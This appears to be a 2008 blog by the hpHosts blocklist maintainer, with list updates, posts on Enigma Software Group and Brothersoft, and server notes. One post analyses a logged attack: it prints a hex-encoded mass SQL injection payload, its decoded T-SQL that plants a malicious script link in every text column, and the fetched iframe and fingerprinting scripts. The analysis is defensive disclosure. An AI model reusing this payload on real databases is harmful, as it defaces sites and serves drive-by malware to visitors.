Blog for hpHosts, and whatever else I feel like writing about ....

Sunday 31 August 2008

Enigma Software Group: Tracking the Hunter Part 2

I recently spoke with Alvin, CEO of ESG, and he also assured me that ESG dropped the affiliates that were involved in the spamming, always a good thing (whether or not they've re-registered as affiliates is anyone's guess - the internet provides a good enough level of annonimity for spammers, so it will be up to ESG to monitor their affiliates, and of course, whilst we certainly shouldn't be policing companies affiliates, if we report those we do find doing wrong, we can also help)

View the full article;
http://mysteryfcm.co.uk/?mode=Articles&date=31-08-2008

Monday 25 August 2008

hpHOSTS - UPDATED August 26th, 2008

hpHOSTS - UPDATED August 26th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 54,010 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 26/08/2008 11:12
  2. Last Verified: 26/08/2008 10:30
Download hpHosts now!
http://hosts-file.net/?s=Download

Sunday 24 August 2008

Exploit efforts increased ......

SQL ExploitYou know you're doing something right when they ramp up their efforts.

I've been seeing these attacks for quite some time now, and they're getting ever more persistent, with the attacks more than doubling within the past few days. The exploit attempts show in the server log as;

2008-08-23 18:32:23 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C
40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534
F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A
6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F
7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F
437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F
2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E
20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F
7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2
F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D
20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C
736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F
772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D
20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F
437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC
(@S); 80 - 58.61.134.162 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1
;+InfoPath.1) - mysteryfcm.co.uk 200 0 0


Previously these attacks were aimed more toward the hpHosts server. Now however, they're aimed at all of the servers on the network, guess I'm annoying the right people???.

The above CAST string is Hex encoded, and decodes to;

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This then loads;

*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://www0.douhunqn.cn/csrss/w.js
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 24 August 2008
Time: 16:30:54:30
*****************************************************************
window.onerror=function()
{
document.write("<iframe width=0 height=0 src=hxxp://www0.douhunqn.cn/csrss/new.htm></iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=hxxp://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');


document.write("<iframe width=0 height=0 src=hxxp://www0.douhunqn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Which loads;

*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://www0.douhunqn.cn/csrss/new.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 5
Date: 24 August 2008
Time: 16:31:27:31
*****************************************************************
<script src='hxxp://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="hxxp://js.users.51.la/2094465.js"></script>


s96.cnzz.com is using FastFlux and loads;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://s96.cnzz.com/stat.php?id=1019605&web_id=1019605
Server IP: 219.232.241.133 [ Resolution failed ]
    > 219.232.241.136 [ Resolution failed ]
    > 219.232.241.139 [ Resolution failed ]
    > 219.232.241.141 [ Resolution failed ]
    > 219.232.241.143 [ Resolution failed ]
    > 219.232.241.144 [ Resolution failed ]
    > 219.232.241.145 [ Resolution failed ]
    > 219.232.243.4 [ Resolution failed ]
    > 219.232.243.5 [ Resolution failed ]
    > 219.232.243.6 [ Resolution failed ]
    > 219.232.243.7 [ Resolution failed ]
    > 219.232.243.8 [ Resolution failed ]
    > 219.232.243.9 [ Resolution failed ]
    > 219.232.243.10 [ Resolution failed ]
    > 219.232.243.55 [ Resolution failed ]
    > 219.232.243.56 [ Resolution failed ]
    > 219.232.241.132 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 24 August 2008
Time: 16:39:34:39
*****************************************************************
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.42642600 1219592199';
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="hxxp://www.cnzz.com/stat/website.php?web_id=1019605" target=_blank title="Õ¾³¤Í³¼Æ">Õ¾³¤Í³¼Æ</a>');
document.write('<img src="hxxp://222.77.187.203/stat.htm?id=1019605'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";

Server maintenance

This is a quick note to let you all know that in 11 hours (approx 23:00 GMT), the gateway will be taken offline for maintenance. This is to allow more stringent filters to be put in place, and a move from Windows to Linux, due to the abnormal amount of traffic increasing and thus, overloading the server.

A backup server will be put in place to minimize the downtime. Affected sites include;

*.hosts-file.net
*.mysteryfcm.co.uk
*.fspamlist.com

Thursday 21 August 2008

Enigma Software Group removed from hpHosts

As a quick note prior to my next article, I'd like to announce the removal of Enigma Software Group from the hpHosts database.

ESG were listed with the FSA (Fraudulent Security Application) classification. However, my recent testing of SpyHunter, coupled with my research into their current practices, have shown they no longer fit the inclusion criteria. ESG have cleaned house, concerning the issues raised in last years article, and have further modified their adverts to prevent confusion.

ESG could have just went on the offensive and threatened to sue all and sundry, but instead, they've worked to resolve issues, and build relationships instead of destroying them further. This is always a good thing, for the security community as a whole, and more importantly - for you, the user.

Wednesday 20 August 2008

Enigma Software Group - SpyHunter and Misleading adverts

I re-tested SpyHunter (see references) an hour or two ago, and am pleased to say, the rogue behaviour I previously witnessed, are all but gone - the only problem with the actual program itself, that I have now are;

1. It still requires payment to remove cookies
2. It still does not come with a fully functional trial

However, as I mentioned to Alvin (CEO, Enigma Software Group), I DO have a major problem with ESG themselves, or rather, their misleading advertising practices.

Rather than re-hash it, I'll simply repeat what I sent to Alvin concerning the issue;
Whilst SH itself seems to be no longer presenting with rogue behaviour, I DO still have concerns over ESG's practices, namely the advertising practices. An example of this is;

http://www.google.co.uk/search?hl=en&q=remove+virusheal&meta=

In the right column, there's an advert which claims to lead to "www{DOT}virusheal-removal.com". This is misleading as it actually leads to "www{DOT}virusheal-removal.com.removal-instructions.com/removeVirusHeal.html".

Screenshot:
http://temp.it-mate.co.uk/imgGoogleAdvert_-_EnigmaSoftwareGroup.gif

On top of this is the advert itself;

"Remove VirusHeal (Free)
How to Remove VirusHeal.
VirusHeal Removal Instructions."

We all know the "(Free)" isn't actually free - it requires payment for SH (yep, there may be manual instructions, but that’s not mentioned in the advert, so is irrelevant).

Though just one example, it's not isolated to the specific keywords I used for this example - ESG need to resolve this and cease using these practices.

/edit

Since publishing this, I've had a response from Alvin on my concerns. Firstly concerning the cookies;
You are entitled to your opinion on this point, I concede that giving cookie
deletion for FREE is reasonable because they are quite harmless, but the
issue is my larger commercial competitors: PCTools, Webroot, Alluria, etc...
Since they are all "pay to remove" cookies, files, and registry entries, and
I know you are aware of this fact. I have to be as competitive as they are.
However, I am open to the idea of removing cookies for free. I have to admit
that is an interesting point....

If SH changes to remove cookies for free, then thats great.

Secondly, on the Google adverts, Alvin advised me that Google has a length restriction on the URL thats placed on the part I mentioned, which explains why it displays as it does. However, in response to this, I've advised that a better option would be to have the main hostname there, instead of the sub-domain part (i.e. removal-instructions.com instead of infection.com). He's also advised me that he's ordered his marketing manager to remove the word "free" from the adverts. Definately a good step.

His response to the adverts was rather lengthy to be placed here, so I've posted the abridged version instead;
Steven, in all honesty, the Google PPC backend has a display URL character
limit, so it is a major pain in the behind to have a descriptive sub-domain.
This is not done for any deceptive or malicious reason. This is done so we
can be as descriptive as possible. Have you ever conducted paid campaigns on
Google? You will see what I mean... That bottom field is mandatory... In
fact, it is a useless field. I would rather they get rid of it and allow
more room to be more descriptive on paid ads.

..... snipped
2. On top of this is the advert itself;

"Remove VirusHeal (Free)
How to Remove VirusHeal.
VirusHeal Removal Instructions."

We all know the "(Free)" isn't actually free - it requires payment for SH
(yep, there may be manual instructions, but that's not mentioned in the
advert, so is irrelevant).


I agree with you on this statement. To say free manual instructions in the
description makes more sense, but I do not want to see the terms "FREE &
REMOVE" on the ad. As you said, it is irrelevant.

This would have been as effective:

Remove VirusHeal
How to Remove VirusHeal.
VirusHeal Removal Instructions

(If it looks a bit weird still, again there is a character restriction per
line on Google Adwords)

I officially ordered my Adwords manager to remove any reference of the word
FREE, so do not go crazy on me if it takes a few days ;) OK? Since it is a
manual task, and the Google Adwords interface is clunky, so bare with me and
then review the changes.

Again, I agree with you on this point, since having the term "FREE" on that
ad is not a value added term for converting customers any way.



References

Enigma Software Group: Tracking the Hunter
http://mysteryfcm.co.uk/?mode=Articles&date=26-04-2007

Tuesday 19 August 2008

Brothersoft gives an example of how best to annoy me ..

Alas annoying me isn't an easy thing to do, I'm a very patient and normally placid person, but as with everyone else - some things just get my goat, and Brothersoft is one of those things.

Long story short, I've been receiving e-mails from them for some time now, that contains;
Hello [ ] [ ]:

In order to prevent unauthorized sign-ups, we want you to confirm your registration request. Verification will allow you to access site features and information only available with registration.

Please confirm your registration by click the link:
hxxp://author.brothersoft.com/?act=Register.reg_confirm&user_name=support@support.it-mate.co.uk&vcode=16553e3a418f02ecdac3a932ade3ef21

Please do not reply to this message, as no recipient has been designated. Replying to this message will not confirm your registration.

Note: If you experience problems with the provided link, simply copy and paste the link above into the address field within your browser.

BrotherSoft Team
hxxp://www.brothersoft.com

Needless to say, I've sent them numerous e-mails telling them I neither requested nor want the account. Most of those times, my e-mails have gone unanswered, sometimes I've gotten a reply such as;
OK,removed.Please come back and check.


2008-07-24
________________________________

support_staff

My last e-mail to them however, resulted in their sending me the following;
Hello:
Sorry to inform you your account has been disabled by Brothersoft because of rule infringement.
In this period, you couldn't submit or manage your software.
If any problem or question, please feel free to contact us.

BrotherSoft Team
hxxp//www.brothersoft.com

Oh dear, they've sent me an e-mail telling me my account has been blocked for rule infringement, fantastic - but I DID NOT ASK FOR THE DAMN ACCOUNT TO BEGIN WITH!!!.

Saturday 16 August 2008

Abnormally high traffic

Alas there is still abnormally high traffic on the hpHosts server. I've been keeping an eye on the server logs over the past few months, and it is apparent that it's either due to HostsMan users sending extremely frequent requests (as mentioned previously) OR lots of people faking the HostsMan user agent (I spoke to HM's developer some time ago and he pondered whether it could be someone faking the UA aswell).

I'm having the server + gateway re-booted as I write this, and will go through the logs once I've got RD access again.

On the plus side, I've also spoken to the developer of WK (the filter I implemented for the server) and he's advised me on how to resolve the access issues for Free Download Manager users. I'll be sorting this out tomorrow.

Tuesday 12 August 2008

Server filter still causing access problems .....

It seems the filter I implemented, is still causing access problems, this time for those using Free Download Manager (I'll refrain from re-publishing my disdain for this program here - see the forums for the story).

I am working on resolving this, and have actually removed the filter match that was supposed to be causing it (basing it on the log files anyway). However, in the meantime, those using FDM that are unable to access either the forums or the website, can download the hphosts file from the alternate mirrors below;

hosts.txt

http://www.it-mate.co.uk/downloads/hosts.txt
http://support.it-mate.co.uk/downloads/hosts.txt
http://freeware.it-mate.co.uk/downloads/hosts.txt
http://avant.it-mate.co.uk/dl/Tools/hpHosts/hosts.txt

Windows (ZIP) (also suitable for Linux)

http://it-mate.co.uk/downloads/hphosts.zip
http://support.it-mate.co.uk/downloads/hphosts.zip
http://freeware.it-mate.co.uk/downloads/hphosts.zip
http://avant.it-mate.co.uk/dl/Tools/hpHosts/hosts.zip
http://downloads.securitycadets.com/hosts.zip (Courtesy Security Cadets)

Windows (Setup)

http://it-mate.co.uk/downloads/hpHosts-Setup-Win32.exe
http://support.it-mate.co.uk/downloads/hpHosts-Setup-Win32.exe
http://freeware.it-mate.co.uk/downloads/hpHosts-Setup-Win32.exe
http://avant.it-mate.co.uk/dl/Tools/hpHosts/hpHosts-Setup-Win32.exe
http://downloads.securitycadets.com/hpHosts-Setup-Win32.exe (Courtesy Security Cadets)

Macintosh

http://it-mate.co.uk/downloads/mac_hosts.zip
http://support.it-mate.co.uk/downloads/mac_hosts.zip
http://freeware.it-mate.co.uk/downloads/mac_hosts.zip
http://avant.it-mate.co.uk/dl/Tools/hpHosts/mac_hosts.zip

If you would like to provide an additional mirror, please get in touch

hpHOSTS - UPDATED August 13th, 2008

hpHOSTS - UPDATED August 13th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,668 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 13/08/2008 03:30

  2. Last Verified: 13/08/2008 03:45

Download hpHosts now!http://hosts-file.net/?s=Download

HOSTS files, IP blacklists, toolbars - is it enough?

HOSTS files, IP blacklists, toolbars - is it enough?

Back in 2006, I wrote an article on the HOSTS file, and how it added an improvement to the security of your computer. Whilst this has not changed, the malware scene has and thus, the security needed to protect your computer, has changed drastically.

HOSTS files

A HOSTS file has never been enough on it's own to protect you, simply because it is far too easy for a malicious program (and depending on your browser settings, a malicious webpage) to completely change or remove, the HOSTS file in seconds, and it is limited to blocking individual hostnames only (it cannot for example, do a wildcard block such as *.badsite.com, and it cannot block IP addresses). Obviously this requires you have a program monitoring the file for changes, such as WinPatrol. So what else is needed?

Announcement & Comments:
http://forum.hosts-file.net/viewtopic.php?f=37&t=657

Full article published at:
http://mysteryfcm.co.uk/?mode=Articles&date=12-08-2008

Monday 11 August 2008

Bah, another Blogspot problem ......

Yep, I've noticed another problem with this blog - I've got it set to pull the latest additions to hpHosts, and for some reason, it's not realised that there's been additions today - it still thinks the last 5 additions were;

wbdigi.com - 10-Aug-2008
ia-support.com - 10-Aug-2008
ia-payment.com - 10-Aug-2008
ia-license.com - 10-Aug-2008
scanner.ia-scanner.com - 10-Aug-2008

.... but nope, the last 5 additions were actually;

1 adserver.zylom.com 194.165.35.109 ATS
2 89-149-194-33.internetser
viceteam.com 89.149.194.33 PSH
3 www.winprotector.net 77.91.225.234 FSA
4 winprotector.net 77.91.225.234 FSA
5 www.pidosoftware.com 67.205.75.9 FSA

/edit

Yeah - I publish this and the damn thing updates itself, and still incorrectly ....... wtf? and why is it still saying the 10th?

adserver.zylom.com - 10-Aug-2008
89-149-194-33.internetserviceteam.com - 10-Aug-2008
winprotector.net - 10-Aug-2008
pidosoftware.com - 10-Aug-2008
alfa-kom.ru - 10-Aug-2008

Thursday 7 August 2008

vURL Desktop Edition

v0.3.3

Changes:

Added: Detect all IP's that a hostname resolves to (including rDNS for those IP's)

Modified: Source button now enabled when clicking to view application log before dissecting site
Modified: Redesigned settings dialog
Modified: Various other modifications

There's also a new change on the Links tab, but I'll let you guys see if you can tell what it is

http://support.it-mate.co.uk/?mode=Products&act=DL&p=vurldesktopedition

Wednesday 6 August 2008

New hpHosts release

hpHOSTS - UPDATED August 6th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,525 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

  1. Latest Updated: 06/08/2008 18:30

  2. Last Verified: 06/08/2008 18:15

Download hpHosts now!
http://hosts-file.net/?s=Download

Tuesday 5 August 2008

First post .....

Well, I finally got round to creating this, and still don't know if I'll be keeping it.

Anywho, until I decide whether to go with this - or just create a blog myself, then err, welcome hehe.